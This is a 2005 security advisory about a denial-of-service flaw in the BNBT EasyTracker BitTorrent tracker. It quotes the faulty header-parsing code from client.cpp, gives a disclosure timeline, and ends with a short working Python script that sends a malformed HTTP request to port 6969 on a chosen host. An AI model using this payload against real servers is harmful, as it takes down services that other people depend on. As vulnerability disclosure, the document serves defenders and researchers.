Summary
"The Trinity Edition of BNBT (TrinEdit) a modified version of BNBT, whose C++ source can be compiled for any operating system; BNBT EasyTracker a Windows Installer for The Trinity Edition of BNBT, a C++ BitTorrent Tracker."

A Denial of Service vulnerability exists within BNBT which allows an attacker to cause the BNBT to stop responding.

Credit:
The information has been provided by Sowhat.
The original article can be found at: http://secway.org/advisory/AD20050830.txt

Details
Vulnerable Systems:
* BNBT version 7.7r3.2004.10.27 and prior

A specifically crafted HTTP request will cause the BNBT Server stop responding.

By Sending a request such as "GET /index.htm HTTP/1.1\r\n:\r\n\r\n" will cause the DoS. It seems that the bug is located in client.cpp, "//grab headers" section.

Code snips:
client.cpp:
// grab headers

string :: size_type iNewLine = m_strReceiveBuf.find( "\r\n" );
string :: size_type iDoubleNewLine = m_strReceiveBuf.find( "\r\n\r\n" );

strTemp = m_strReceiveBuf.substr( iNewLine + strlen( "\r\n" ),
iDoubleNewLine - iNewLine - strlen( "\r\n" ) );

while( 1 )
{
string :: size_type iSplit = strTemp.find( ":" );
string :: size_type iEnd = strTemp.find( "\r\n" );

if( iSplit == string :: npos )
{
UTIL_LogPrint( "client warning - malformed HTTP request (bad header)\n" );

break;
}

string strKey = strTemp.substr( 0, iSplit );
string strValue = strTemp.substr( iSplit + strlen( ": " ), iEnd - iSplit -
strlen( "\r\n" ) );//Bug here ??

rqst.mapHeaders.insert( pair<string, string>( strKey, strValue ) );

strTemp = strTemp.substr( iEnd + strlen( "\r\n" ) );

if( iEnd == string :: npos )
break;
}

Disclosure Timeline:
2005.08.22 Vendor notified via Webform,no email found
2005.08.30 Vendor no response. Advisory Released

Exploit:
//BNBTDOS.py
# BNBT EasyTracker Remote D.O.S Exploit
# Bug discoverd and coded by Sowhat
# http://secway.org

# Version 7.7r3.2004.10.27 and below
# the BNBT project: http://bnbteasytracker.sourceforge.net/

import sys
import string
import socket

if (len(sys.argv) != 2):
print "\nUsage: " + sys.argv[0] + " TargetIP\n"
print "#################################"
print "# #"
print "# BNBT EasyTracker Remote D.O.S Exploit #"
print "# Bug discoverd and coded by Sowhat #"
print "# http://secway.org #"
print "#################################"
sys.exit(0)

host = sys.argv[1]
port = 6969

payload = "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,port))
s.send(payload)